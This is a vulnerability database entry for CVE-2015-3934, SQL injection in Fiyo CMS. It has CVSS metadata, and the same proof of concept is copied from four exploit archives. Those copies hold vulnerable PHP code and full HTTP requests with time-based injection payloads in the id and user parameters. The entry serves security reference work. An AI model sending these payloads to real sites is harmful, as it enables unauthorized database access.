ID CVE-2015-3934
Type cve
Reporter cve@mitre.org
Modified 2017-12-12T15:39:00
Description
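Multiple SQL injection vulnerabilities in Fiyo CMS 2.0_1.9.1 allow remote attackers to execute arbitrary SQL commands via the (1) id parameter to apps/app_article/controller/rating.php or (2) user parameter to user/login. In the code excerpts quoted by the referenced advisories, both values are interpolated directly into the SQL condition string: id with no filtering at all, and user after only strip_tags(), which removes HTML/PHP tags and does not escape SQL metacharacters. The record scores the issue as network-reachable with no authentication required (CVSS v2 7.5, CVSS v3.0 9.8, CWE-89) and references no vendor patch. The root cause is addressed by passing both parameters through parameterized queries and validating id as an integer, not by tag stripping or other input filtering.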
{"id": "CVE-2015-3934", "bulletinFamily": "NVD", "title": "CVE-2015-3934", "description": "Multiple SQL injection vulnerabilities in Fiyo CMS 2.0_1.9.1 allow remote attackers to execute arbitrary SQL commands via the (1) id parameter to apps/app_article/controller/rating.php or (2) user parameter to user/login.", "published": "2017-11-21T15:29:00", "modified": "2017-12-12T15:39:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3934", "reporter": "cve@mitre.org", "references": ["http://packetstormsecurity.com/files/132479/Fiyo-CMS-2.0_1.9.1-SQL-Injection.html"], "cvelist": ["CVE-2015-3934"], "type": "cve", "lastseen": "2021-02-02T06:21:25", "edition": 4, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-23811"]}, {"type": "exploitdb", "idList": ["EDB-ID:37446"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:132479"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:24A00C597F2907AD9BD275A4EFF99273"]}], "modified": "2021-02-02T06:21:25", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-02-02T06:21:25", "rev": 2}, "vulnersScore": 7.4}, "cpe": ["cpe:/a:fiyo:fiyo_cms:2.0.1.9.1"], "affectedSoftware": [{"cpeName": "fiyo:fiyo_cms", "name": "fiyo fiyo cms", "operator": "eq", "version": "2.0.1.9.1"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": 
"CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:fiyo:fiyo_cms:2.0.1.9.1:*:*:*:*:*:*:*"], "cwe": ["CWE-89"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:fiyo:fiyo_cms:2.0.1.9.1:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "http://packetstormsecurity.com/files/132479/Fiyo-CMS-2.0_1.9.1-SQL-Injection.html", "refsource": "MISC", "tags": ["Third Party Advisory", "VDB Entry"], "url": "http://packetstormsecurity.com/files/132479/Fiyo-CMS-2.0_1.9.1-SQL-Injection.html"}]}
{"zdt": [{"lastseen": "2018-03-28T11:20:35", "description": "Exploit for php platform in category web applications", "edition": 2, "published": "2015-07-01T00:00:00", "type": "zdt", "title": "Fiyo CMS 2.0_1.9.1 - SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3934"], "modified": "2015-07-01T00:00:00", "id": "1337DAY-ID-23811", "href": "https://0day.today/exploit/description/23811", "sourceData": "# Exploit Title: Fiyo CMS multiple SQL vulnerability\r\n# Date: 2015-06-28\r\n# Exploit Author: cfreer (poc-lab)\r\n# Vendor Homepage: http://www.fiyo.org/\r\n# Software Link:\r\nhttp://tcpdiag.dl.sourceforge.net/project/fiyo-cms/Fiyo%202.0/fiyo_cms_2.0.2.zip\r\n# Version: 2.0_1.9.1\r\n# Tested on: Apache/2.4.7 (Win32)\r\n# CVE : CVE-2015-3934\r\n \r\n \r\n1\u3001\r\n \r\nThe vulnerable file is /apps/app_article/controller/rating.php, because the\r\nrating.php includes jscore.php, so we must add referer in\r\nHTTP Data Stream to bypass the limits of authority.when the 'do' equal\r\n'rate' the vulnerable is same too.\r\n \r\n \r\nrequire('../../../system/jscore.php');\r\n \r\nif(!isset($_POST['id']))\r\nheader('../../../');\r\nelse {\r\n$id = $_POST['id'];\r\n $db = new FQuery();\r\n$db->connect();\r\n$qrs = $db->select(FDBPrefix.'article','*',\"id=$id\");\r\n$qrs = $qrs[0];\r\n \r\n \r\nPOC:\r\n \r\nHTTP Data Stream\r\n \r\nPOST //fiyocms/apps/app_article/controller/rating.php HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101\r\nFirefox/37.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost:80/fiyocms/\r\nCookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ;\r\nPHPSESSID=nl1e3jdfd8i7flnhffp37ro2s3\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 48\r\n \r\ndo=getrate&id=182;select sleep(5) --\r\n 
\r\n \r\n \r\n=====================================================================================================================================\r\n \r\n2\u3001\r\n \r\nPOC:\r\n \r\nPOST /fiyocms/user/login HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101\r\nFirefox/37.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nCookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ;\r\nPHPSESSID=4gl29hsns650jqj5toakt044h0\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 71\r\n \r\nuser='%2B(select(0)from(select(sleep(5)))v)%2B'&pass=poc-lab&login=Login\r\n \r\n \r\nThe vulnerable file is \\apps\\app_user\\sys_user.php\r\n \r\nif(isset($_POST['login'])) {\r\n$_POST['user'] = strip_tags($_POST['user']);\r\n$qr = $db->select(FDBPrefix.\"user\",\"*\",\"status=1 AND user='$_POST[user]'\r\nAND password='\".MD5($_POST['pass']).\"'\");\r\n \r\n \r\nThe parameter of user is vulnerable. strip_tags doesn't work, Still can be\r\nbypass.\n\n# 0day.today [2018-03-28] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/23811"}], "exploitdb": [{"lastseen": "2016-02-04T05:51:20", "description": "Fiyo CMS 2.0_1.9.1 - SQL Injection. CVE-2015-3934. 
Webapps exploit for php platform", "published": "2015-06-30T00:00:00", "type": "exploitdb", "title": "Fiyo CMS 2.0_1.9.1 - SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3934"], "modified": "2015-06-30T00:00:00", "id": "EDB-ID:37446", "href": "https://www.exploit-db.com/exploits/37446/", "sourceData": "# Exploit Title: Fiyo CMS multiple SQL vulnerability\r\n# Date: 2015-06-28\r\n# Exploit Author: cfreer (poc-lab)\r\n# Vendor Homepage: http://www.fiyo.org/\r\n# Software Link:\r\nhttp://tcpdiag.dl.sourceforge.net/project/fiyo-cms/Fiyo%202.0/fiyo_cms_2.0.2.zip\r\n# Version: 2.0_1.9.1\r\n# Tested on: Apache/2.4.7 (Win32)\r\n# CVE : CVE-2015-3934\r\n\r\n\r\n1\u3001\r\n\r\nThe vulnerable file is /apps/app_article/controller/rating.php, because the\r\nrating.php includes jscore.php, so we must add referer in\r\nHTTP Data Stream to bypass the limits of authority.when the 'do' equal\r\n'rate' the vulnerable is same too.\r\n\r\n\r\nrequire('../../../system/jscore.php');\r\n\r\nif(!isset($_POST['id']))\r\nheader('../../../');\r\nelse {\r\n$id = $_POST['id'];\r\n $db = new FQuery();\r\n$db->connect();\r\n$qrs = $db->select(FDBPrefix.'article','*',\"id=$id\");\r\n$qrs = $qrs[0];\r\n\r\n\r\nPOC:\r\n\r\nHTTP Data Stream\r\n\r\nPOST //fiyocms/apps/app_article/controller/rating.php HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101\r\nFirefox/37.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost:80/fiyocms/\r\nCookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ;\r\nPHPSESSID=nl1e3jdfd8i7flnhffp37ro2s3\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 48\r\n\r\ndo=getrate&id=182;select sleep(5) 
--\r\n\r\n\r\n\r\n=====================================================================================================================================\r\n\r\n2\u3001\r\n\r\nPOC:\r\n\r\nPOST /fiyocms/user/login HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101\r\nFirefox/37.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nCookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ;\r\nPHPSESSID=4gl29hsns650jqj5toakt044h0\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 71\r\n\r\nuser='%2B(select(0)from(select(sleep(5)))v)%2B'&pass=poc-lab&login=Login\r\n\r\n\r\nThe vulnerable file is \\apps\\app_user\\sys_user.php\r\n\r\nif(isset($_POST['login'])) {\r\n$_POST['user'] = strip_tags($_POST['user']);\r\n$qr = $db->select(FDBPrefix.\"user\",\"*\",\"status=1 AND user='$_POST[user]'\r\nAND password='\".MD5($_POST['pass']).\"'\");\r\n\r\n\r\nThe parameter of user is vulnerable. 
strip_tags doesn't work, Still can be\r\nbypass.", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/37446/"}], "packetstorm": [{"lastseen": "2016-12-05T22:15:04", "description": "", "published": "2015-06-29T00:00:00", "type": "packetstorm", "title": "Fiyo CMS 2.0_1.9.1 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3934"], "modified": "2015-06-29T00:00:00", "id": "PACKETSTORM:132479", "href": "https://packetstormsecurity.com/files/132479/Fiyo-CMS-2.0_1.9.1-SQL-Injection.html", "sourceData": "`# Exploit Title: Fiyo CMS multiple SQL vulnerability \n# Date: 2015-06-28 \n# Exploit Author: cfreer (poc-lab) \n# Vendor Homepage: http://www.fiyo.org/ \n# Software Link: \nhttp://tcpdiag.dl.sourceforge.net/project/fiyo-cms/Fiyo%202.0/fiyo_cms_2.0.2.zip \n# Version: 2.0_1.9.1 \n# Tested on: Apache/2.4.7 (Win32) \n# CVE : CVE-2015-3934 \n \n \n1\u3001 \n \nThe vulnerable file is /apps/app_article/controller/rating.php, because the \nrating.php includes jscore.php, so we must add referer in \nHTTP Data Stream to bypass the limits of authority.when the 'do' equal \n'rate' the vulnerable is same too. 
\n \n \nrequire('../../../system/jscore.php'); \n \nif(!isset($_POST['id'])) \nheader('../../../'); \nelse { \n$id = $_POST['id']; \n$db = new FQuery(); \n$db->connect(); \n$qrs = $db->select(FDBPrefix.'article','*',\"id=$id\"); \n$qrs = $qrs[0]; \n \n \nPOC: \n \nHTTP Data Stream \n \nPOST //fiyocms/apps/app_article/controller/rating.php HTTP/1.1 \nHost: localhost \nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 \nFirefox/37.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 \nAccept-Encoding: gzip, deflate \nReferer: http://localhost:80/fiyocms/ \nCookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ; \nPHPSESSID=nl1e3jdfd8i7flnhffp37ro2s3 \nConnection: keep-alive \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 48 \n \ndo=getrate&id=182;select sleep(5) -- \n \n \n \n===================================================================================================================================== \n \n2\u3001 \n \nPOC: \n \nPOST /fiyocms/user/login HTTP/1.1 \nHost: localhost \nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 \nFirefox/37.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 \nAccept-Encoding: gzip, deflate \nCookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ; \nPHPSESSID=4gl29hsns650jqj5toakt044h0 \nConnection: keep-alive \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 71 \n \nuser='%2B(select(0)from(select(sleep(5)))v)%2B'&pass=poc-lab&login=Login \n \n \nThe vulnerable file is \\apps\\app_user\\sys_user.php \n \nif(isset($_POST['login'])) { \n$_POST['user'] = strip_tags($_POST['user']); \n$qr = $db->select(FDBPrefix.\"user\",\"*\",\"status=1 AND user='$_POST[user]' \nAND password='\".MD5($_POST['pass']).\"'\"); \n \n \nThe parameter of user is vulnerable. 
strip_tags doesn't work, Still can be \nbypass. \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/132479/fiyocms20191-sql.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:15", "description": "\nFiyo CMS 2.0_1.9.1 - SQL Injection", "edition": 1, "published": "2015-06-30T00:00:00", "title": "Fiyo CMS 2.0_1.9.1 - SQL Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3934"], "modified": "2015-06-30T00:00:00", "id": "EXPLOITPACK:24A00C597F2907AD9BD275A4EFF99273", "href": "", "sourceData": "# Exploit Title: Fiyo CMS multiple SQL vulnerability\n# Date: 2015-06-28\n# Exploit Author: cfreer (poc-lab)\n# Vendor Homepage: http://www.fiyo.org/\n# Software Link:\nhttp://tcpdiag.dl.sourceforge.net/project/fiyo-cms/Fiyo%202.0/fiyo_cms_2.0.2.zip\n# Version: 2.0_1.9.1\n# Tested on: Apache/2.4.7 (Win32)\n# CVE : CVE-2015-3934\n\n\n1\u3001\n\nThe vulnerable file is /apps/app_article/controller/rating.php, because the\nrating.php includes jscore.php, so we must add referer in\nHTTP Data Stream to bypass the limits of authority.when the 'do' equal\n'rate' the vulnerable is same too.\n\n\nrequire('../../../system/jscore.php');\n\nif(!isset($_POST['id']))\nheader('../../../');\nelse {\n$id = $_POST['id'];\n $db = new FQuery();\n$db->connect();\n$qrs = $db->select(FDBPrefix.'article','*',\"id=$id\");\n$qrs = $qrs[0];\n\n\nPOC:\n\nHTTP Data Stream\n\nPOST //fiyocms/apps/app_article/controller/rating.php HTTP/1.1\nHost: localhost\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101\nFirefox/37.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nReferer: http://localhost:80/fiyocms/\nCookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ;\nPHPSESSID=nl1e3jdfd8i7flnhffp37ro2s3\nConnection: keep-alive\nContent-Type: 
application/x-www-form-urlencoded\nContent-Length: 48\n\ndo=getrate&id=182;select sleep(5) --\n\n\n\n=====================================================================================================================================\n\n2\u3001\n\nPOC:\n\nPOST /fiyocms/user/login HTTP/1.1\nHost: localhost\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101\nFirefox/37.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nCookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ;\nPHPSESSID=4gl29hsns650jqj5toakt044h0\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 71\n\nuser='%2B(select(0)from(select(sleep(5)))v)%2B'&pass=poc-lab&login=Login\n\n\nThe vulnerable file is \\apps\\app_user\\sys_user.php\n\nif(isset($_POST['login'])) {\n$_POST['user'] = strip_tags($_POST['user']);\n$qr = $db->select(FDBPrefix.\"user\",\"*\",\"status=1 AND user='$_POST[user]'\nAND password='\".MD5($_POST['pass']).\"'\");\n\n\nThe parameter of user is vulnerable. strip_tags doesn't work, Still can be\nbypass.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}